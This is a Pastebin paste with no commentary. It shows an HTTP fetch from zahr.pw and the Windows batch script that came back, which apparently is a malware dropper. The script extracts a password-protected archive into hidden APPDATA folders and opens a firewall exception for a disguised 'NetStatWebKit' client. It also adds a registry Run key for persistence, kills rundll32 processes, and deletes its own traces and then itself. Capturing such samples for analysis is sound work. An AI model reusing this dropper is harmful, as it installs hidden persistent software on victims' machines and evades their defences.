API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 29th, 2016
90
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.90 KB | None | 0 0
raw download clone embed print report
  1. GET /sh/shlapsizeof HTTP/1.1
  2. Host: zahr.pw
  3.  
  4. HTTP/1.1 200 OK
  5. Server: nginx/1.10.1
  6. Date: Thu, 29 Sep 2016 17:57:42 GMT
  7. Content-Type: application/octet-stream
  8. Content-Length: 1392
  9. Last-Modified: Sat, 24 Sep 2016 13:56:49 GMT
  10. Connection: keep-alive
  11. ETag: "57e68621-570"
  12. Accept-Ranges: bytes
  13.  
  14. HTTP/1.1 200 OK
  15. Server: nginx/1.10.1
  16. Date: Thu, 29 Sep 2016 17:57:42 GMT
  17. Content-Type: application/octet-stream
  18. Content-Length: 1392
  19. Last-Modified: Sat, 24 Sep 2016 13:56:49 GMT
  20. Connection: keep-alive
  21. ETag: "57e68621-570"
  22. Accept-Ranges: bytes
  23.  
  24. set a=cd
  25. set b=attrib
  26. set c=taskkill
  27. %a% "%APPDATA%"
  28. %b% +h "%APPDATA%\shlapsizeof.cmd"
  29. if exist "%APPDATA%\nwe.bin" goto end
  30. "%APPDATA%\7sh.exe" x -pf3ls0gd -y "%APPDATA%\sharchivedmngr" -o"%APPDATA%"
  31. %b% +h +s +r "%APPDATA%\lappclimtfldr"
  32. del /f /q "%APPDATA%\sharchivedmngr"
  33. %a% "%APPDATA%"
  34. %a% lappclimtfldr
  35. %b% +h +s +r /s /d
  36. netsh firewall add allowedprogram "%APPDATA%\lappclimtfldr\mcrtvclient.exe" NetStatWebKit ENABLE
  37. if exist mcrtvclient.exe start mcrtvclient.exe
  38. %c% /f /im rundll32.exe
  39. ping 127.0.0.1 -n 1
  40. %c% /f /im rundll32.exe
  41. reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "NetStatWebKit" /t REG_SZ /d "%APPDATA%\lappclimtfldr\mcrtvclient.exe"
  42. %c% /f /im mcrtvclient.exe
  43. ping 127.0.0.1 -n 2
  44. if exist mcrtvclient.exe start mcrtvclient.exe
  45. %c% /f /im rundll32.exe
  46. echo 1>"%APPDATA%\nwe.bin"
  47. %b% +s +h "%APPDATA%\nwe.bin"
  48. reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "NetStatWebKit" /t REG_SZ /d "%APPDATA%\lappclimtfldr\mcrtvclient.exe"
  49. :end
  50. %b% -h "%APPDATA%\shlapsizeof.cmd"
  51. if not exist "%APPDATA%\java.exe" (del /f /q "%APPDATA%\7sh.exe")
  52. del /f /q "%APPDATA%\sharchivedmngr"
  53. del /f /q "%APPDATA%\java.exe"
  54. del /f /q "%APPDATA%\*.js"
  55. del /f /q "%APPDATA%\input"
  56. %b% -h "%APPDATA%\shlapsizeof.cmd"
  57. del /f /q "%APPDATA%\shlapsizeof.cmd"
  58. %c% /f /im rundll32.exe
  59. del %0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!